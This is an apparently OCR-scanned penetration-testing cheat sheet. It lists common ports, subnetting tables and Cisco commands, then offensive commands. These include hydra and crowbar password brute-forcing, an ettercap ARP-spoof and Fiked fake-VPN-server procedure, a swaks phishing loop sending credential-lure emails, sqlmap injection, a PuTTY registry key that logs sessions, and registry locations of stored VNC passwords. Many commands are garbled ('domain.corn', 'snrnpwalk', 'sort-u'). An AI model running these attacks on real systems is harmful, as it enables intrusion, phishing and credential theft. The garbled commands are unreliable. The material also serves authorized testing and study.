Network
Network
Common ports
21
FTP
22
SSH
23 Tel net
25
SMTP
49
TACACS
53 DNS
8/67 DHCP (UDP)
69 TFTP (UDP)
80
HTTP
88 Kerberos
110
POP3
111 RPC
123 NTP (UDP)
135
Windows RPC
137 NetBIOS
138
NetBIOS
139
SMB
143 IMAP
161 SNMP (UDP)
179
BGP
201 Apple Talk
389 LDAP
443 HTTPS
445
SMB
500
ISAKMP (UDP)
514 Syslog
520
R.I.P
7/546 DHCPv6
587 SMTP
902 VMware
1080
Socks Proxy
1194
VPN
1433/4 MS-SQL
1521
Oracle
1629
DarneWare
2049
NFS
3128
Squid Proxy
3306
MySQL
3389
RDP
5060
SIP
5222
Jabber
5432
Postgres
5666
Nagios
5900
VNC
6000
X11
6129
DameWare
6667
IRC
9001
Tor
9001
HSQL
9090/1 Open fire
9100
Jet Direct
Get operating system information with TTL
Windows
128
Linux
64
255
Solaris
255
ftp status codes
Waiting for user login 220
Not authenticated 530
http status codes
Successful connection 200
Lack of access 403
IPV4 information
Classful range
A 0.0.0.0
127.255.255.255
B 128.0.0.0
191.255.255.255
C
192.0.0.0
223.255.255.255
D 224.0.0.0
239.255.255.255
E
240.0.0.0
255.255.255.255
Range Reversed
10.0.0.0
10.255.255.255
127.0.0.0
127.255.255.255
172.16.0.0
172.31.255.255
192.168.0.0
192.168.255.255
Subnetting
/31
255.255.255.254
1 Host
/30
255.255.255.252
2 Hosts
/29
255.255.255.248
6 Hosts
/28
255.255.255.240
14 Hosts
/27
255.255.255.224
30 Hosts
/26
255.255.255.192
62 Hosts
/25
255.255.255.128
126 Hosts
/24
255.255.255.0
254 Hosts
/23
255.255.254.0
510 Hosts
/22
255.255.252.0
1022 Hosts
/21
255.255.248.0
2046 Hosts
/20
255.255.240.0
4096 Hosts
/19
255.255.224.0
8190 Hosts
/18
255.255.192.0
16382 Hosts
/17
255.255.128.0
32766 Hosts
/16
255.255.0.0
65534 Hosts
/15
255.254.0.0
131070 Hosts
/14
255.252.0.0
262142 Hosts
/13
255.248.0.0
524286 Hosts
/12
255.240.0.0
1048574 Hosts
/11
255.224.0.0
2097150 Host
/10
255.192.0.0
4194302 Host
/9
255.128.0.0
8388606 Host
/8
255.0.0.0
16777214 Hosts
Calculate the subnet range
Given: 1.1.1.101/28
/28 = 255.255.255.240 netmask
256 - 240 = 16 = subnet ranges of 16, i.e.
1.1.1.0
1.1.1.16
1.1.1.32 ...
Range where given IP falls: 1.1.1.96 - 1.1.1.111IPV6 information
Broadcast addresses
ff02::1 - link-local nodes
ff05::1 - site-local nodes
ff01::2 - node-local routers
ff02::2 - link-local routers
ff05::2 - site-local routersInterface addresses
fe80:: -link-local
2001:: - routable
::a.b.c.d- IPv4 compatible IPv6
::ffff:a.b.c.d- IPv4 mapped IPv6ipv6 toolbox
Remote Network DoS:
rsumrf6 eth# remote ipv6port forward with chisel
./chisel server -p 9000 --reverse
./chisel client <ip>:9000 R:4500:127.0.0.1:4500Or
./chisel server -p 9000 --reverse
./chisel client <ip>:9000 R:socksipv6 tunnel in ipv4 with socat
socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001::]:80
./nikto.pl -host 12-.0.0.1 -port 8080Cisco commands
enable
Enable privilege mode
#configure terminal
interface settings
(config)#interface fa0/0
Configure FastEthernet 0/0
(config-if)#ip addr 1.1.1.1 255.255.255.0
Set IP to fa0/0
(config)#line Vty 0 4
set vty line
(config-line)#login
Set telnet password
(config-line)#password password
Set password for telnet
#show session
reopen session
#show version
IOS version
#dir file systems
Available files
#dir all-filesystems
File Information
#dir /all
Delete files
#show running-config
settings in memory
#show startup-config
Settings inside boot
#show ip interface brief
List of Interfaces
#show interface e0
interface information details
#show ip route
List of Routes
#show access-lists
Access Lists
#terminal length 0
No limit on output
#copy running-config startup-config
Place settings from memory to boot
#copy running-config tftp
Copy settings on tftp
IOS 11.2-12.2 vulnerabilities
http:// ip /level/ 16-99 /exec/show/configSVN
List of files and folders
svn list svn://10.10.10.10/Empty/activity reports
svn log svn://10.10.10.10/change list
svn diff -c r2 svn://10.10.10.10Guess the password of OVA, O365, skype business
python3 atomizer.py owa 10.10.10.10 pass.txt user.txt -i 0:0:01SNMP protocol
Need to start the tftp service
./snmpblow.pl -s srcip -d rtr_ip -t attackerip -f out.txt
snmpstrings.txtWindows executive services list
snrnpwalk -c public -v1 ip 1 | grep hrSWRJnName | cut -d" " -f4Windows open ports
smpwalk | grep tcpConnState | cut -d" " -f6 | sort-uInstalled software
smpwalk | grep hrSWInstalledNameWindows users
snmpwalk ip 1.3 | grep 77.1.2.25 -f4Shared files
snmpwalk -v 1 -c public 10.13.37.10Listening with responder
responder -I eth1 -vPacket recording
Recording of port packets 22-23
tcpdump -nvvX -sO -i eth0 tcp portrange 22-23Capture specific ip traffic other than subnet
tcpdump -I eth0 -tttt dst ip and not net 1.1.1.0/24Traffic recording 192.1
tcpdump net 192.1.1Timed recording of traffic
dumpcap -I eth0 -a duration: sec -w file file.pcapCheck Reply PCAP
file2cable -i eth0 -f file.pcapChecking Reply packets (FUZZ | Dos)
tcpreplay --topspeed --loop=O --intf=eth0 .pcap_file_to replay rnbps=10|100|1000DNSRecon command
Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d domain.corn
Enumerate suborders:
./dnsrecon.rb -t brt -d domain.corn -w hosts.txt
DNS zone transfer:
./dnsrecon -d domain.corn -t axfrreverse dns lookup operation and checking the output with nmap
nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2"
"$3)=="Nmap scan report")print$5" "$6}' | sed 's/(//g' I sed 's/)//g'
dns.txtVPN
Write psk on the file
ike-scan -M -A vpn ip -P fileattack vpn server
ike-scan -A -t 1 --sourceip= spoof ip dst ipFiked - Create fake vpn server
Must know the VPN group name a~d pre-shared key;
1. Ettercap filter to drop IPSEC traffic (UDP port 500)
if(ip.proto == UDP && udp.scc == 500) {
kill();
drop();
msg (" UDP packet dropped ") ;
2. Compile filter
etterfilter udpdrop.filter -o udpdrop.ef
3. Start Ettercap and drop all IPSEC ~raffic
#ettercap -T -g -M arp -F udpdrop.ef // //
4. Enable IP Forward
echo "1" /proc/sys/net/ipv4/ip_forward
5. Configure IPtables to port forward to Fiked server
iptables -t nat -A PREROUTING -p udp -I eth0 -d VPN Server IP -j
DNAT - - to Attacking Host IP
iptables -P FORWARD ACCEP~
6. Start Fiked to impersonate the VPN Server
fiked - g vpn gatewa; ip - k VPN Group Name:Group Pre-Shared Ke;
7. Stop Ettercap
8. Restart Ettercap without the filter
ettercap -T -M arp II IIGuess username with hydra
hydra -L ~/seclists/Usernames/Names/femalenames-usa-top1000.txt -p Welcome123! IP PROTOCOLDisplay smb paths with smbclient
smbclient -U USERNAME -L IPAccessing the system environment using WRM
ruby evil-winrm.rb -u USER -p PASS -i IPDirecting local traffic to a specified address
simpleproxy -L 8000 -R 10.10.10.10:1337Putty software
Registry key to report any operation by putty (even commands and outputs)
[HKEY_CURRENT_USER\Software\Si~onTatham\Putt;\Sessions\Default%20Settings]
"LogFileName"="%TEMP%\putty.dat"
"LogType"=dword:00000002"ldap
Search for important ldap information using impackt
ldapsearch -h <host> -x -b "dc=<dc>,dc=local"Display all ldap structural information
ldapsearch -x -LLL -w PASSWORD#ftp
Connect to ftp with username and password
lftp -e 'set ssl:verify-certificate false' -u "user,pass" -p 21 10.10.10.10Printers
Establish connection
python pret.py 10.10.10.10 pjlEmail sending and smtp password guessing
1.
nc -lvnp 80
2.
while reading mail; do swaks --to $mail --from [email protected] --header "Subject: Credentials /
Errors" --body "goto http://10.10.10.19/" --server 10.10.10.10; done < mails.txtvnc
Decode the VNC Install.reg file
vncpwd.exe <ENCRYPTEDPASSWORD>Oe
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password
TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
HKLM\SOFTWARE\TightVNC\Server\ControlPassword
tightvnc.ini
vnc_viewer.ini
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2##CCTV
Data collection
nmap -Pn -sV --script "rtsp-*" -p 554 10.10.10.10/24Guess the password
rtspbrute -t ip.txt -p 554Jack of all trades
docker run -t ullaakut/cameradar -t 192.168.100.0/24SSH
connect to SSH service on the target
ssh <target> scan for open SSH port on the target
nmap -p 22 <target> - brute force SSH login
hydra -L users.txt -P passwords.txt ssh://<target> - 80 (HTTP)
retrieve content from the HTTP server on the target
curl http://<target> - scan for open HTTP port on the target
nmap -p 80 <target> directory enumeration on the HTTP server
dirb http://<target> 443 (HTTPS)
retrieve content from the HTTPS server on the target
curl https://<target> scan for open HTTPS port on the target
nmap -p 443 <target> perform SSL/TLS vulnerability scan on HTTPS server
sslscan <target>:443 21 (FTP)
connect to FTP service on the target
ftp <target> scan for open FTP port on the target
nmap -p 21 <target> brute force FTP login
hydra -l <username> -P passwords.txt ftp://<target> 25 (SMTP)
connect to SMTP service on the target
telnet <target> 25 scan for open SMTP port on the target
nmap -p 25 <target> enumerate valid users on SMTP server
smtp-user-enum -M VRFY -U users.txt -t <target> 53 (DNS)
perform DNS lookup on the target
nslookup <target> scan for open DNS port on the target
nmap -p 53 <target> perform DNS enumeration on the target
dnsrecon -d <target> 110 (POP3)
connect to POP3 service on the target
telnet <target> 110 scan for open POP3 port on the target
nmap -p 110 <target> brute force POP3 login
hydra -l <username> -P passwords.txt pop3://<target> 143 (IMAP)
connect to IMAP service on the target
telnet <target> 143 scan for open IMAP port on the target
nmap -p 143 <target> - brute force IMAP login
hydra -l <username> -P passwords.txt imap://<target> - 3306 (MySQL)
connect to MySQL service on the target
mysql -h <target> -u <username> -p scan for open MySQL port on the target
nmap -p 3306 <target> perform SQL injection on MySQL database
sqlmap -u "http://<target>/index.php?id=1" --dbs 3389 (RDP)
connect to RDP service on the target
rdesktop <target> scan for open RDP port on the target
nmap -p 3389 <target> brute force RDP login
crowbar -b rdp -s <target>/32 -u users.txt -C passwords.txt 5900 (VNC remote desktop)
connect to VNC service on the target
vncviewer <target> nmap -p 5900 <target>
Last updated